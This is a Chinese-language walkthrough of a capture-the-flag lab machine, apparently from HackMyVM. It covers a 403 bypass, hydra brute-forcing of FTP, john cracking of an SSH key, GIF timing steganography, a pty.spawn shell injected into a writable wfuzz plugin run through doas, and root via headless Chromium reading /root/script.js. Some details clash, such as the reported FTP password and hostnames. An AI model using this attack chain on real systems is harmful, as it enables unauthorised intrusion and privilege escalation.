信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.234  08:00:27:a5:6f:25       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f5:54:75       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.093 seconds (122.31 hosts/sec). 4 responded
❯ export ip=192.168.60.234
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.234:22
Open 192.168.60.234:80
Open 192.168.60.234:8080
Open 192.168.60.234:23333
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-08 10:57 CST
Initiating ARP Ping Scan at 10:57
Scanning 192.168.60.234 [1 port]
Completed ARP Ping Scan at 10:57, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:57
Scanning primary.hmv (192.168.60.234) [4 ports]
Discovered open port 8080/tcp on 192.168.60.234
Discovered open port 80/tcp on 192.168.60.234
Discovered open port 23333/tcp on 192.168.60.234
Discovered open port 22/tcp on 192.168.60.234
Completed SYN Stealth Scan at 10:57, 0.05s elapsed (4 total ports)
Nmap scan report for primary.hmv (192.168.60.234)
Host is up, received arp-response (0.00050s latency).
Scanned at 2025-03-08 10:57:15 CST for 0s

PORT      STATE SERVICE    REASON
22/tcp    open  ssh        syn-ack ttl 64
80/tcp    open  http       syn-ack ttl 64
8080/tcp  open  http-proxy syn-ack ttl 64
23333/tcp open  elxmgmt    syn-ack ttl 64
MAC Address: 08:00:27:A5:6F:25 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
           Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

枚举目录

发现存在/secret.php

❯ gobuster dir -u  "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.234
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 4464]
/post.php             (Status: 200) [Size: 3]
/secret.php           (Status: 200) [Size: 549]
Progress: 99471 / 1102800 (9.02%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 99980 / 1102800 (9.07%)
===============================================================
Finished
===============================================================

源码泄露

curl一下，发现页面中的代码并不会解析，而是直接以文本的形式输出了

源码中有个传参是aaa，即可显示/opt/note/dic.txt下的文件

但问题是我们没法解析

❯ curl $ip/secret.php
<!DOCTYPE html>
<html>
<head>
    <title>Secret</title>
</head>
<body>
    <?php
    $greeting = date('H') < 12 ? '早上好' : (date('H') < 18 ? '下午好' : '晚上好');
    $visitorIP = htmlspecialchars($_SERVER['REMOTE_ADDR']);

    echo "<h1>{$greeting}，adriana</h1>";
    echo "<p>当前时间：" . date('Y-m-d H:i:s') . "</p>";
    echo "<p>你的IP：{$visitorIP}</p>";
    if (isset($_GET['aaa'])) {
        $file_content = file_get_contents('/opt/note/dic.txt');
        echo $file_content;
        } else {
                die();
        }
    ?>
</body>
</html>

Bypass403

换个方向，同时还开放8080端口

尝试扫一下

❯ gobuster dir -u  "http://$ip:8080" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.234:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 281]
/index.html           (Status: 200) [Size: 33]
/javascript           (Status: 301) [Size: 328] [--> http://192.168.60.234:8080/javascript/]
/silence   (Status: 403) [Size: 281]
/.html                (Status: 403) [Size: 281]
/server-status        (Status: 403) [Size: 281]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

得到/silence，不过显示403未授权，给我拒绝了

❯ curl $ip:8080/under_construction
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.56 (Debian) Server at 192.168.60.234 Port 8080</address>
</body></html>

尝试利用bypass403脚本跑一下

❯ bypass-403.sh $ip:8080/silence/
 ____                                  _  _    ___ _____
| __ ) _   _ _ __   __ _ ___ ___      | || |  / _ \___ /
|  _ \| | | | '_ \ / _` / __/ __|_____| || |_| | | ||_ \
| |_) | |_| | |_) | (_| \__ \__ \_____|__   _| |_| |__) |
|____/ \__, | .__/ \__,_|___/___/        |_|  \___/____/
       |___/|_|
                                               By Iam_J0ker
./bypass-403.sh https://example.com path

403,281  --> 192.168.60.234:8080/under_construction/
403,281  --> 192.168.60.234:8080/under_construction/%2e/
403,281  --> 192.168.60.234:8080/under_construction//.
403,281  --> 192.168.60.234:8080/under_construction////
403,281  --> 192.168.60.234:8080/under_construction/.//./
403,281  --> 192.168.60.234:8080/under_construction/ -H X-Original-URL:
403,281  --> 192.168.60.234:8080/under_construction/ -H X-Custom-IP-Authorization: 127.0.0.1
403,281  --> 192.168.60.234:8080/under_construction/ -H X-Forwarded-For: http://127.0.0.1
403,281  --> 192.168.60.234:8080/under_construction/ -H X-Forwarded-For: 127.0.0.1:80
403,281  --> 192.168.60.234:8080/under_construction -H X-rewrite-url:
403,281  --> 192.168.60.234:8080/under_construction/%20
403,281  --> 192.168.60.234:8080/under_construction/%09
403,281  --> 192.168.60.234:8080/under_construction/?
403,281  --> 192.168.60.234:8080/under_construction/.html
403,281  --> 192.168.60.234:8080/under_construction//?anything
403,281  --> 192.168.60.234:8080/under_construction/#
200,638  --> 192.168.60.234:8080/under_construction/ -H Content-Length:0 -X POST
403,281  --> 192.168.60.234:8080/under_construction//*
403,281  --> 192.168.60.234:8080/under_construction/.php
403,281  --> 192.168.60.234:8080/under_construction/.json
405,304  --> 192.168.60.234:8080/under_construction/  -X TRACE
403,281  --> 192.168.60.234:8080/under_construction/ -H X-Host: 127.0.0.1
403,281  --> 192.168.60.234:8080/under_construction/..;/
000,0  --> 192.168.60.234:8080/under_construction/;/
405,304  --> 192.168.60.234:8080/under_construction/ -X TRACE
403,281  --> 192.168.60.234:8080/under_construction/ -H X-Forwarded-Host: 127.0.0.1

发现利用利用POST方法请求即可返回正常200

从源码中可以获取到域名primary.hmv

❯ curl $ip:8080/under_construction/ -H Content-Length:0 -X POST
<!DOCTYPE html>
<html>
<head>
  <title>Under Construction</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      text-align: center;
      margin: 0;
      padding: 0;
    }

    .container {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }

    h1 {
      font-size: 30px;
    }

    p {
      font-size: 18px;
      color: #888;
    }
  </style>
</head>
<body>
  <div class="container">
    <div>
      <h1>Under Construction</h1>
      <p>We are working to improve our website.</p>
      <p>contact: [email protected]</p>
    </div>
  </div>
</body>
</html>

编辑一下hosts，添加域名

1
2
3

❯ echo "$ip chromee.hmv"|sudo tee -a /etc/hosts
[sudo] password for Pepster:
192.168.60.234 chromee.hmv

Ftp爆破

这时候我们重新返回80端口通过域名去请求secret.php

得到一个新的用户名adriana

并且通过上面拿到的源码，可以得知传参aaa即可拿到dic.txt文本

有个提示，好像是个小故事

❯ curl http://primary.hmv/secret.php\?aaa
<!DOCTYPE html>
<html>
<head>
    <title>Secret</title>
</head>
<body>
    <h1>早上好，adriana</h1><p>当前时间：2025-03-08 05:06:50</p><p>你的IP ：192.168.60.100</p>The Lost Key

Lily, a curious girl, found an old rusty key in the woods. Wondering where it belonged, she asked everyone in the village, but no one knew. One day, she discovered a locked stone well. To her surprise, the key fit. She opened it and descended into a hidden passage. There, she found an ancient chest filled with treasures. But the real treasure was a note inside: “The greatest treasure is the journey, not the prize.” Lily smiled, realizing the adventure was the real reward.
莉莉，一个好奇的女孩，在树林里发现了一把古老生锈的钥匙。想知道它属于哪里，她问村子里的每个人，但没有人知道。有一天，她发现了一个上锁的石井。令她惊讶的是，这把钥匙合适。她打开了它并下到一个隐藏通道中。在那里，她找到了一个装满珍宝的古老箱子。但真正的宝藏是箱子内部的一张纸条：“最大的财富是旅程本身，并非奖品。”莉莉微笑着意识到冒险才是真正的回报。
</body>
</html>

同时我们发现23333端口上开放着vsftp服务

所以我们将文本保存下来，利用CUPP生成字典去爆破23333端口中的ftp服务

❯ vi dic.txt
❯ python cupp.py -w dic.txt
 ___________
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\
              ||--|| *      [ Muris Kurgas | [email protected] ]
                            [ Mebus | https://github.com/Mebus/]


      *************************************************
      *                    WARNING!!!                 *
      *         Using large wordlists in some         *
      *       options bellow is NOT recommended!      *
      *************************************************

> Do you want to concatenate all words from wordlist? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to dic.txt.cupp.txt, counting 1545 words.
> Hyperspeed Print? (Y/n) :
[+] Now load your pistolero with dic.txt.cupp.txt and shoot! Good luck!

尝试hydra爆破一下

得到新的凭证adriana:Lily2020

❯ hydra -l adriana -P dic.txt.cupp.txt ftp://$ip:23333 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-08 12:09:19
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1545 login tries (l:1/p:1545), ~97 tries per task
[DATA] attacking ftp://192.168.60.234:23333/
[STATUS] 720.00 tries/min, 720 tries in 00:01h, 825 to do in 00:02h, 16 active
[23333][ftp] host: 192.168.60.234   login: adriana   password: into2006
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-08 12:10:22

尝试连接一下，在隐藏目录中得到一个...文件

❯ ftp adriana@$ip -p 23333
Connected to 192.168.60.234.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||24481|)
150 Here comes the directory listing.
drwxr-xr-x    2 106      115          4096 Mar 09 08:13 .
drwxr-xr-x    4 0        0            4096 Mar 09 08:12 ..
-rw-r--r--    1 0        0            3414 Mar 09 08:13 ...
-rw-r--r--    1 0        0             495 Mar 07 14:40 dic.txt
226 Directory send OK.
ftp> get ...
local: ... remote: ...
229 Entering Extended Passive Mode (|||18588|)
150 Opening BINARY mode data connection for ... (3414 bytes).
100% |*****************************|  3414        1.57 MiB/s    00:00 ETA
226 Transfer complete.
3414 bytes received in 00:00 (643.00 KiB/s)

而且可以得知拥有两个用户follower softly

ftp> cd /home
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||50875|)
150 Here comes the directory listing.
drwxr-xr-x    4 0        0            4096 Mar 07 02:55 .
drwxr-xr-x   18 0        0            4096 Mar 07 10:41 ..
drwxr-x---    4 1000     1000         4096 Mar 09 07:59 follower
drwxr-x---    3 1001     1001         4096 Mar 07 12:39 softly
226 Directory send OK.
ftp> exit
221 Goodbye.

查看私钥有没有备注用户名登信息，发现私钥加密了

john爆破一下，得到密码cassandra

❯ chmod 600 id_rsa
❯ ssh-keygen -c -f id_rsa
Enter passphrase:

❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cassandra        (id_rsa)
1g 0:00:00:35 DONE (2025-03-08 13:16) 0.02827g/s 28.95p/s 28.95c/s 28.95C/s andre..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

通过私钥的comment发现并未存在备注

❯ ssh-keygen -c -f id_rsa
Enter passphrase:
Old comment: 
New comment:

尝试分别利用两个用户名连接

用户提权

ssh连接一下，获得一个新的提示

❯ ssh follower@$ip -i id_rsa
Enter passphrase for key 'id_rsa':
follower@pepster:~$ id
uid=1000(follower) gid=1000(follower) grupos=1000(follower)
follower@pepster:~$ cat note.txt
Think about rotations and the cat’s secrets.


47 is not just a number, it's a twist of fate.

follower@pepster:~$ cat /etc/passwd| grep /bin/bash
root:x:0:0:root:/root:/bin/bash
follower:x:1000:1000::/home/follower:/bin/bash
softly:x:1001:1001::/home/softly:/bin/bash

再次信息收集

发现家目录存在cat.gif图片

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/follower/cat.gif
/root/
/var/www/html/post.php

Gif时间轴隐写

这是一张不会动的gif图片

查看一下图片详细，其中Comment中标注了Imagemagick Convert Timeline

❯ exiftool cat.gif
ExifTool Version Number         : 13.10
File Name                       : cat.gif
Directory                       : .
File Size                       : 3.5 MB
File Modification Date/Time     : 2025:03:09 14:53:46+08:00
File Access Date/Time           : 2025:03:09 14:54:36+08:00
File Inode Change Date/Time     : 2025:03:09 14:53:46+08:00
File Permissions                : -rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 640
Image Height                    : 640
Has Color Map                   : Yes
Color Resolution Depth          : 8
Bits Per Pixel                  : 8
Background Color                : 0
Animation Iterations            : Infinite
Comment                         : Imagemagick Convert Timeline
Profile CMM Type                :
Profile Version                 : 4.3.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 2016:01:01 00:00:00
Profile File Signature          : acsp
Primary Platform                : Unknown ()
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             :
Device Model                    :
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Media-Relative Colorimetric
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 :
Profile ID                      : 0
Profile Description             : sRGB
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Media White Point               : 0.9642 1 0.82491
Red Tone Reproduction Curve     : (Binary data 40 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 40 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 40 bytes, use -b option to extract)
Profile Copyright               : Google Inc. 2016
Frame Count                     : 13
Duration                        : 6.31 s
Image Size                      : 640x640
Megapixels                      : 0.410

通过ctf-wiki中得知GIF图片可能存在时间轴隐写

GIF - CTF Wiki

尝试利用一下，得到前7位的间隔时间都不同

❯ identify -format "%s %T \n" cat.gif>cat.txt
❯ cat cat.txt
0 65
1 98
2 65
3 100
4 102
5 98
6 67
7 6
8 6
9 6
10 6
11 6
12 6

猜测可能是ASCII码

文本处理一下

1 2	❯ cat cat.txt\|awk 'NR <=7 {print $2}'\|xargs 65 98 65 100 102 98 67

利用CyberChef解码，同时用户还说幸运数字是47，猜测ROT47

得到密码p3p573r

通过验证得知是用户follower的密码，但sudo也没有

follower@pepster:~$ su follower
Contraseña:
follower@pepster:~$
follower@pepster:~$ sudo -l
-bash: sudo: orden no encontrada

Wfuzz提权

仔细观察linpeas.sh的扫描结果，发现靶机存在doas

不过在doas默认的配置文件中并没有存在文件

follower@pepster:~$ which doas
/usr/local/bin/doas
follower@pepster:~$ cat /etc/doas.conf
cat: /etc/doas.conf: No existe el fichero o el directorio

猜测可能修改了配置文件的路径

利用find查找所有名为*.conf的文件

发现doas的配置文件藏在/srv/zeus.conf中

follower@pepster:~$ find / -name *.conf 2>/dev/null |grep -Pv "proc|sys|usr|etc"
/run/tmpfiles.d/static-nodes.conf
/srv/zeus.conf
follower@pepster:~$ cat /srv/zeus.conf
permit follower as softly cmd /usr/local/bin/wfuzz
permit nopass :softly as root cmd /usr/bin/chromium

这里也可以利用编译后生成的man手册来查看doas的配置路径

follower@Chromee:~$ man doas

EXIT STATUS
     The doas utility exits 0 on success, and >0 if an error occurs.  It may fail for one of the following reasons:

     •   The config file /srv/zeus.conf could not be parsed.
     •   The user attempted to run a command which is not permitted.
     •   The password was incorrect.
     •   The specified command was not found or is not executable.

用户follower运允许以softly的身份执行/usr/local/bin/wfuzz

同时发现wfuzz中有个模块我们拥有写权限

1
2
3

follower@pepster:~$ find / -writable 2>/dev/null|grep -Pv "proc|sys|dev|var|run|tmp|home"
/etc/alternatives/php-fpm.sock
/usr/local/lib/python3.9/dist-packages/wfuzz/plugins/payloads/file.py

尝试利用下，编辑python文件

即可提权至softly用户

follower@pepster:~$ vi /usr/local/lib/python3.9/dist-packages/wfuzz/plugins/payloads/file.py
import pty
pty.spawn("/bin/bash")
follower@pepster:~$ doas -u softly /usr/local/bin/wfuzz -z file
Password:
 /usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
 /usr/local/lib/python3.9/dist-packages/wfuzz/wfuzz.py:77: UserWarning:Fatal exception: Bad usage: You must specify an URL.
follower@pepster:~$ doas -u softly /usr/local/bin/wfuzz -z file -u 127.0.0.1
Password:
 /usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
softly@pepster:/home/follower$

先拿个flag

Root提权

根据doas的配置文件，用户softly可以执行/usr/bin/chromium⁉️

1
2
3

softly@pepster:/home/follower$ cd ~
softly@pepster:~$ cat user.txt
flag{c5dbe81aac6438c522d2f79cc7255e6a}

打开浏览器是什么操作

我传个pspy上去，监测一下系统进程

发现root会每分钟运行一次/root/script.sh

2025/03/08 06:58:01 CMD: UID=0     PID=18689  | /usr/sbin/CRON -f
2025/03/08 06:58:01 CMD: UID=0     PID=18690  | /usr/sbin/CRON -f
2025/03/08 06:58:01 CMD: UID=0     PID=18691  | /bin/sh -c /root/script.sh
2025/03/08 06:58:01 CMD: UID=0     PID=18692  | /bin/bash /root/script.sh

Chrome Remote Debugger

再次信息收集

发现在/media存在一个debug.kdbx

softly@pepster:/tmp$ find / -readable -type f 2>/dev/null|grep -Pv "proc|sys|boot|usr|run|etc|var"
/home/softly/.profile
/home/softly/.bash_logout
/home/softly/user.txt
/home/softly/.config/wfuzz/wfuzz.ini
/home/softly/.bashrc
/tmp/pspy64
/tmp/linpeas.sh
/srv/zeus.conf
/opt/note/.../secret.zip
/opt/note/dic.txt
/media/debug.kdbx

将文件拷贝到/tmp目录中

1
2
3

softly@pepster:/tmp$ cd /media/
softly@pepster:/media$ cp debug.kdbx /tmp/
softly@pepster:/media$ chmod 777 debug.kdbx

scp传一下到本地

通过file查看，得知是个pdf文档

❯ scp -i id_rsa follower@$ip:/tmp/debug.kdbx .
Enter passphrase for key 'id_rsa':
debug.kdbx                               100%   14KB   2.1MB/s   00:00
❯ file debug.kdbx
debug.kdbx: PDF document, version 1.7
❯ mv debug.kdbx debug.pdf

给了一个提示Chrome DevTools并且端口9222是加粗了

那直接让GPT给出一个命令

注意不要敲错了，以root身份运行的chromium无法kill进程

1	softly@pepster:~$ doas /usr/bin/chromium --headless --remote-debugging-port=9222 --no-sandbox http://127.0.0.1 &

--headless：

这个参数将 Chromium 以无头模式运行。无头模式是指没有图形用户界面的运行模式，通常用于自动化和测试。

--remote-debugging-port=9222：

这个参数指定了远程调试的端口号为 9222。它允许你通过指定的端口远程调试 Chromium 浏览器。

--no-sandbox：

这个参数禁用了 Chromium 的沙箱功能。沙箱是一种安全机制，通常用于隔离进程以提高安全性。禁用沙箱可能会降低安全性，但在某些情况下可能是必要的，例如在无头模式下运行时。

http://127.0.0.1：

指定启动时要访问的网址。

查看本地端口开放，利用socat端口转发一下

softly@pepster:~$ ss -luntp
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:PortProcess
udp   UNCONN 0      0            0.0.0.0:68         0.0.0.0:*
tcp   LISTEN 0      10         127.0.0.1:9222       0.0.0.0:*
tcp   LISTEN 0      511          0.0.0.0:80         0.0.0.0:*
tcp   LISTEN 0      128          0.0.0.0:22         0.0.0.0:*
tcp   LISTEN 0      32                 *:23333            *:*
tcp   LISTEN 0      511             [::]:80            [::]:*
tcp   LISTEN 0      511                *:8080             *:*
tcp   LISTEN 0      128             [::]:22            [::]:*
softly@pepster:/tmp$ chmod +x socat
softly@pepster:/tmp$ ./socat TCP-LISTEN:1234,fork TCP4:127.0.0.1:9222 &

chrome浏览器访问chrome://inspect/

连接上后会发现多出两个页面

进入第一个即可

同时我们利用pspy监听进程

2025/03/08 07:21:01 CMD: UID=0     PID=19624  | /usr/sbin/CRON -f
2025/03/08 07:21:01 CMD: UID=0     PID=19625  | /usr/sbin/CRON -f
2025/03/08 07:21:01 CMD: UID=0     PID=19626  | /bin/sh -c /root/script.sh
2025/03/08 07:21:01 CMD: UID=0     PID=19627  | /bin/bash /root/script.sh

发现脚本一执行会访问127.0.0.1/post.php页面

同时会附带key值

猜测root密码即为UGhhbnRvbSBFbmdhZ2UK

softly@pepster:/tmp$ su root
Password:
root@pepster:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)
root@pepster:/tmp# cd ~
root@pepster:~# cat root.txt
flag{e96f7a29ba633b4e43214b43d1791074}

这里再贴一个Ta0的思路，chromium有个--dump-dom参数是可以在无头模式下显示完整的HTML DOM

而且总所周知浏览器是可以进行file:///读取本地文件的

所以直接添加--dump-dom参数即可获取脚本中发送的POST数据，即可拿到Root的密码

softly@Chromee:~$ doas /usr/bin/chromium --headless --dump-dom --disable-gpu --no-sandbox "file:///root/script.js"
[0401/095504.711549:WARNING:bluez_dbus_manager.cc(248)] Floss manager not present, cannot set Floss enable/disable.
<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">const CDP = require('chrome-remote-interface');

async function sendPostRequest() {
    const client = await CDP();

    const { Network, Page, Runtime } = client;

    try {
        // 启用网络调试
        await Network.enable();

        // 启用页面调试
        await Page.enable();

        // 访问页面
        await Page.navigate({ url: 'http://127.0.0.1:80' });
        await Page.loadEventFired();  // 等待页面加载完成

        console.log('Page loaded. Sending POST request...');

        // 在浏览器环境中执行 fetch 发送 POST 请求
        const postData = JSON.stringify({ key: 'UGhhbnRvbSBFbmdhZ2UK' });

        const script = `
            fetch('http://127.0.0.1/post.php', {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: '${postData}'
            }).then(res =&gt; res.text()).then(console.log).catch(console.error);
        `;

        // 通过 Runtime.evaluate 在浏览器里执行 JavaScript 代码
        await Runtime.evaluate({ expression: script });

    } catch (err) {
        console.error('Error:', err);
    } finally {
        client.close();
    }
}

sendPostRequest();

</pre></body></html>